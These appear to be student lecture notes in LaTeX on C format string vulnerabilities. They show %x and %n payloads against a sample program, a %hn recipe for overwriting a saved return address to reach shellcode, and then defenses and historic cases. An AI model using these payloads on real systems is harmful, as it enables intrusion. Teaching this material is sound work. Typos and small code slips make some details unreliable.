
\subsection{Format strings}
In, e.g., C language , format string are strings that contains specific characters , called
\textbf{conversion specifications} characters (\lstinline{%d,%s,etc.}). Format string also exist in other language such as Python for example.


\subsubsection{Fortatted output functions}
\noindent Format strings are usually exploited by \textbf{formatted output functions} such as \lstinline{printf} and derivatives (\lstinline{fprintf, vprintf, sprint},...). Formatted output functions consist of a format string and a variable number of
arguments, usually one for each conversion specification of the format string.


\begin{center}
    \includegraphics[scale=0.4]{image/24.PNG}
\end{center}

\begin{itemize}
    \item \lstinline{fprintf()} writes output to a \textbf{stream} based on the contents of the format string. The stream, format string, and a variable list of arguments are provided as arguments
    \item \lstinline{printf()} is equivalent to \lstinline{fprintf()} except that \lstinline{printf()} assumes that the output stream is stdout
    \item \lstinline{sprintf()} is equivalent to \lstinline{fprintf()} except that the output is written into an array rather than to a stream
\end{itemize}
Formatted output functions are \textbf{variadic} functions. This means that they accept a variable number of arguments
\begin{itemize}
    \item [$\Rightarrow$]User Contract: \#of calling conventions $=$ \#of arguments ($=$ Vulnerability)
\end{itemize}
Variadic functions are implemented using either the UNIX System V or the ANSI C approach. Both approaches require that the contract between the developer and user of the variadic function not be violated by the user. But the architecture may allow you to violate this contract ... (no way to count). This should remind of the “memory management class. \textbf{Potential error} forget one argument linked to a convention call. 
\subsubsection{Conversion specification}
There are two main types of conversion specification:
\vspace{-0.3cm}
\begin{multicols}{2}
\begin{enumerate}
    \item \textbf{Direct:}
    \begin{itemize}
        \item Argument is transmitted as a \textit{value}
        \item \lstinline{%d}, expect an integer transmitted as a value
        \item \lstinline{%u}, expect a natural transmitted as a value
        \item \lstinline{%x}, expect an hexadecimal transmitted as a value
    \end{itemize}
    \item \textbf{Address based:}
    \begin{itemize}
        \item Argument is transmitted as a \textit{reference}
        \item \lstinline{%s}, expect a pointer to a string
        \item \lstinline{%n}, save number of chars printed before reaching \lstinline{%n}
    \end{itemize}
\end{enumerate}
\null\vfill
\columnbreak
\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{C}
int main(){
    int i = 5;
    printf("I have %d cats",i);
}
\end{minted}
\lstinline[language=C, mathescape=false]!%i$d! allows us to print argument number i.\\
\lstinline[language=C, mathescape=false]!%Xd! generates an integer of size X.
\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{C}
int main(){
    char *a = "UCLouvain ";
    printf("name of the university : %s \n",a);
}
\end{minted}

\end{multicols}
%If the wrong type of format is used, then the compiler won't compile and put warning/error messages.
\subsubsection{Variadic functions on the stack}
\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{C}
int main(){
    int b = 600;
    char *uc = "UCLouvain "; 
    printf("name of the university : %s %d\n",uc, b);
}
\end{minted}

\begin{center}
    \includegraphics[scale=0.5]{image/25.PNG}
\end{center}


\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{C}
int main(){
    int b = 600;
    char *uc = "UCLouvain "; 
    printf("name of the university : %s %d\n"); // No argument is passed: what will be read ?
    // What is in the stack where the arguments should have been. Here: local variables before printf!
}
\end{minted}

\begin{center}
    \includegraphics[scale=0.5]{image/26.PNG}
\end{center}

\subsubsection{Dynamic format string: a potential vulnerability}

A problem arises when a format string contains conversion specifications that are not
matched with arguments. Mostly when the system \textbf{gives the control of the content} of the output function \textbf{to the user}. This is called a dynamic format string cannot be guessed by reading the code). Let us first show how \lstinline{%x} can help us to read anywhere on the stack and \lstinline{%n} to write there.

\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{C}
int main(int argc , char argv) {
    char msg[1024];
    strncpy(msg,arv[1],1024);
    msg[1023] = '\0';
    printf(msg);
    printf("\n");
    return 0;
}
\end{minted}

\begin{itemize}
    \item \lstinline{./vuln yop} $\rightarrow$ \lstinline{yop}
    \item \lstinline{./vuln %x%x%x%x%x} $\rightarrow$ \lstinline{ffc5b3f44005658b5c7f7d2bcb8}
    \item \lstinline{./vuln  AAAA%x%x%x%x%x%x%x%x%x%x%x} $\rightarrow$ \\\lstinline{AAAAffe1f3e2400566545c7f7d58cb8677f9a5ff7f4f110ffe1dd1411f7d5bdc841414141}, 41 $=$ A , 8th \%x point to beginning of msg. Indeed, we went to higher addresses in the stack and eventually met msg. We control msg , and more generally anything higher in the stack, which may be dangerous. $\Rightarrow$ \lstinline{%x} allows to \textbf{read} on the stack
    
    \item \lstinline{./vuln %s} $\rightarrow$ \lstinline{Segmentation fault} Tries to print the string at address pointed by s. This address is likely to not be defined but this could change if one could put an interesting address on the vulnerable buffer, use \lstinline{%x} to reach it and then \lstinline{%s} to display it
    
    \item \lstinline{./vuln 0xbffffe48%x%x%x%x%x%x%x%n} $\rightarrow$ will save 66 at \lstinline{0xbffffe48}. We have 66 because 10 char for \lstinline{0xbffffe48} and 8 char for each of the seven \lstinline{%x}.
    $\Rightarrow$ \lstinline{%n} allows to \textbf{write} on the stack
\end{itemize}

\subsubsection{Example}
\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{C}
int main(int argc , char *argv[]){
    char text [1024];
    static int test_val = -72;
    strcpy(text,argv[1]);
    printf("the right way to do things \n");
    printf("%s",text);
    printf("the wrong way to do things \n");
    printf(text);
    printf("\n");
    printf("test val is %d at 0x%08x and contains 0x%08x",test_val,&test_val,test_val);
    exit(0);
}
\end{minted}
\begin{itemize}
    \item \lstinline{./vuln AAAA%x%x%x%x} 
    \begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{bash}
the right way to do things:
AAAA%x%x%x%x the wrong way to do things:
AAAAffffcdb0f7fcd110565561f3 41414141
test val is -72 at 0x56559008 and contains 0xffffffb8
\end{minted}
    \item \lstinline[mathescape=false]{./vuln $(printf "\x08\x90\x55\x56")%x%x%x%n} 
    \begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{bash}
the right way to do things:
§UV%x%x%x%n the wrong way to do things:
§UVffffcdb0f7fcd110565561f3
test val is 28 at 0x56559008 and contains 0x0000001c
\end{minted}
\end{itemize}

\noindent In case of a client/server:
\begin{itemize}
    \item Vulnerability can be exploited to read to eventually rewrite variables on server’s stack
    \item Vulnerability can be used to crash the system
\end{itemize}

\subsection{Shell code and format string}
Stack cannot be smatched (but one can still write on the stack!). However, one can rewrite content of addresses stored in the stack with \lstinline{%n}. The principle is very similar to the one used to evade a canary. Let us write address of saved EIP in an appropriate place, so that we can modify its content.\footnote{\url{https://github.com/JonathanSalwan/ROPgadget}}\footnote{\url{https://www.exploit-db.com/docs/english/28553-linux-classic-return-to-libc-&-return-to-libc-chaining-tutorial.pdf}}\\

\noindent Use GDB to find:
\begin{itemize}
    \item [$A1$]saved EIP
    \item [$A2$]beginning of buffer
    \item[$\Rightarrow$]Write A1 at beginning of buffer (i.e., A2), then use several \lstinline{%x} to reach the beginning of the buffer, i.e., A2, with \lstinline{printf} and \lstinline{%n} to write some interesting address A3, which is inside the buffer (to be expended, but likely to be a shellcode)
\end{itemize}
\noindent Observations:
\begin{enumerate}
    \item The position of the buffer in terms of arguments (\lstinline{%x}) can be obtained
    \item Writing A3 requires to write several chars, indeed \lstinline{%n} only counts number of chars that are printed before reaching it!
\end{enumerate}
\noindent How to:
\begin{enumerate}
    \item Prepare a shell code contained in a buffer, just as before
    \item Write A1, address where saved EIP is saved at beginning of buffer, i.e. at address A2
    \item Then add some NOPS in the buffer and the shell code.
    \item Then print several characteres with \lstinline{%n} to write an adress A3 in NOPS on A1 (preceded by # of \lstinline{%x} to reach the buffer)
    \item The address in NOPS thus replaces the one of saved EIP
\end{enumerate}

\noindent Assume that 5 times \lstinline{%x} are enough to print beginning of buffer. Position of beginning of arguments in terms of convention calls $=$ 5 argument.
\begin{itemize}
    \item [$\Rightarrow$]|NOPS| $+$ |Shellcode| $+$ |Plenty of arguments| $+$ |\%Xd| $=$ A3\\
    So one must chose X adequately. (not sure of the representation)
\end{itemize}

\begin{center}
    \includegraphics[scale=0.7]{image/27.PNG}
\end{center}

\paragraph{Difficulty} We said to use \lstinline{%n} to write an address in NOPS on A1 (\lstinline{%n} counts the number of characters printed before \lstinline{%n}) We thus need to display a lot of characters by using \lstinline[mathescape=false]{$Xd}. \lstinline{0xbffffe48} (A3) corresponds to \lstinline{3221225032} char in decimal. It may be the case that displaying \lstinline{0xbffffe48} chars is not possible (do not forget it is an argument!) The argument would be too large.\\

\noindent \textbf{Solution}: how to write \lstinline{0xbffffe48} (A3) in \lstinline{0xbffffcec} (A1)
\begin{itemize}
    \item Use \lstinline{%hn}, it is the same as \lstinline{%n} except that it writes 2 bytes instead of 4
    \item Split \lstinline{0xbffffcec} into \lstinline{0xbffffcee} and \lstinline{bffffcec}
    \item The objective will be to write \lstinline{fe48} (65096) in\lstinline{ bffffcec} and \lstinline{bfff} (49151) in \lstinline{bffffcee}
    \item The form of the buffer is now:\\
    \lstinline[mathescape=false]!  bffffcee + bffffcec + NOPS + shellcode + %Xd + %5$hn + %Yd + 6$hn!
\end{itemize}
\begin{itemize}
    \item Assume a shell code of size 39, and 34 NOPS\\
    Values for X and Y:
    \begin{itemize}
        \item $X= 49151 - 8 - NOPS - SHELLCODE = 49070$
        \item $Y = 65096 - X -8 - NOPS - SHELLCODE = 15945$
    \end{itemize}
\end{itemize}


\subsection{Prevention/Detection}
\begin{enumerate}
    \item \textbf{Forbid} \lstinline{%n}: Does not prevent from reading memory and some programs needs it.
    \item \textbf{Permit only static format strings:} Many programs use dynamic ones (e.g Client/Server). In fact, the GNU internationalization library, generate format strings dynamically, so this too would break an undesirable amount of software.
\end{enumerate}

\subsubsection{Lexical Analysis}
The \lstinline{pscan} tool is a lexical analysis tool that automatically scans source code for format string vulnerabilities. The scan works by searching for formatted output functions and applying the following rule
\begin{center}
    “IF the last parameter of the function is the format string, AND the format string is NOT a static string, THEN complain”
\end{center}

\noindent \textbf{Limits:}
\begin{itemize}
    \item Does not detect vulnerabilities if arguments follow the string
\end{itemize}

\subsubsection{FormatGuard: Counting the number of arguments (old)}

Patch to \lstinline{glibc} rather old (from 2002) by restricting the number of arguments processed by a variadic function to the actual number of arguments passed. Done by replacing the normal call to a modified function that uses a specific token based mechanism to count arguments. Counting is hard arguments are passed as \lstinline{varargs list}, which has no counting mechanism. Use CPP macros and specific methods to count arguments using \lstinline{varargs}.\\

\noindent \textbf{Limits:}
\begin{itemize}
    \item Block function that contains fewer conversion convention than arguments, can be fixed
    \item Indirect call to functions disabled the mechanism
    \item Some functions such as \lstinline{vprintf} have their own \lstinline{varargs list}
    \item CPP macros may not all be compatible with C
    \item Requires \lstinline{glibc} compilation, i e source code
\end{itemize}


\subsubsection{Compiler option (now replace formatguard)}
To warm about uses of format functions where the format string is not a string literal
and there are no format arguments. View it as formatguard embeded. \\


\noindent Options Wformat (called with \lstinline{-Wall}) and \lstinline{-Wformat-security} of gcc
\begin{minted}[
frame=lines,
framesep=2mm,
baselinestretch=1.2,
fontsize=\footnotesize,
escapeinside=||,
mathescape=true
]{bash}
$ gcc Wformat o fmt fmt.c fmt.c:19: warning: format %08x expects type unsigned int’, but argument 3 has type ’int *’
    fmt.c:19: warning: too few arguments for format
$ gcc Wformat Wformat security o fmt2 fmt2.c fmt2.c:13: warning: format not a string literal and no format arguments
\end{minted}
\noindent \textbf{Limits:}
\begin{itemize}
    \item \lstinline{int (*printf_ptr) (const char *format,...)=&printf;}
\end{itemize}


\subsubsection{Libsafe Implementation (for \%n)}
\lstinline{Libsafe} known to implement safer versions of vulnerable ones. Version 2 0 prevents format string vulnerability exploits that attempt to overwrite return addresses on the stack. \lstinline{Libsafe} logs a warning and terminates the targeted process Its first task is to make sure that the functions can be safely executed based on their arguments. \textbf{Does not require source code}.\footnote{\url{https://www.researchgate.net/publication/2400968_Libsafe_20_Detection_of_Format_String_Vulnerability_Exploits}}\\
%\newpage
\noindent Two checks:
\begin{enumerate}
    \item The first check examines the pointer argument associated with each \lstinline{%n} conversion specifier to determine whether the address references a return address or frame pointer
    \item The second check determines whether the initial location of the argument pointer is in the same stack frame as the final location of the argument pointer
\end{enumerate}

\noindent \textbf{Limits:}
\begin{itemize}
    \item Restrict access to current stack frame
    \item Problem: password may be stored there (hence can be modified/read)
    \item Conclusion: Does not protect from programs trying to read in the stack frame
\end{itemize}

\subsubsection{Testing}
It is extremely difficult to construct a test suite that exercises all possible paths
through a program. A major source of format string bugs comes from error reporting code. Because such code is triggered as a result of exceptional conditions, these paths are often missed by runtime testing.\\
\textbf{News}: situation is changing work of Xavier Devroye).

\subsubsection{Static Taint Analysis}
Inputs from untrusted sources are marked as tainted, data propagated from a tainted source is marked as tainted. A warning is generated if tainted data is interpreted as a format string but can generate a lot of false positives.

\subsection{Format string vs buffer overflow}

\begin{center}
    \includegraphics[scale=0.6]{image/28.PNG}
\end{center}


\subsection{Some vulnerabilities}
\footnote{\url{https://repo.zenk-security.com/Techniques%20d.attaques%20%20.%20%20Failles/Hackin9%20Vulnerabilites%20de%20type%20format%20string.pdf}}

\footnote{\url{http://slidegur.com/doc/1080849/formatted-output-secure-coding-in-c-and-c---robert-c.-sea}} 

\begin{center}
    \includegraphics[scale=0.6]{image/29.PNG}
\end{center}

\subsubsection{The Stunnem vulnerability}
Secure TCP connection via shannel. \lstinline{smtp_client()} from version 3.2 is vulnerable
\begin{itemize}
    \item \lstinline{stunnel -c -n smtp \ -r 127.0.0.1:4444} (client)
    \item \lstinline{nc -l -p 4444} (simulate smtp), \lstinline{AAAA%x%x%x%x} will read client’s stack
\end{itemize}

\subsubsection{The Wut-ftpd vulnerability}
Washington University FTP daemon \lstinline{wu-ftpd} is a popular UNIX FTP server shipped
with many distributions of Linux and other UNIX operating systems. A format string vulnerability exists in the \lstinline{insite_exec()} function of \lstinline{wu-ftpd} versions before 2.6.1. \lstinline{wu-ftpd} is a string vulnerability where the user input is incorporated in the format string of a formatted output function in the Site \lstinline{Exec} command functionality.


\subsubsection{The CDE ToolTalk vulnerability}
The common desktop environment CDE is an integrated graphical user interface that runs on UNIX and Linux operating systems. CDE ToolTalk is a message brokering system that provides an architecture for
applications to communicate with each other across hosts and platforms. There is a remotely exploitable format string vulnerability in versions of the CDE
ToolTalk RPC database server.

%\subsection{Additional content}

\newpage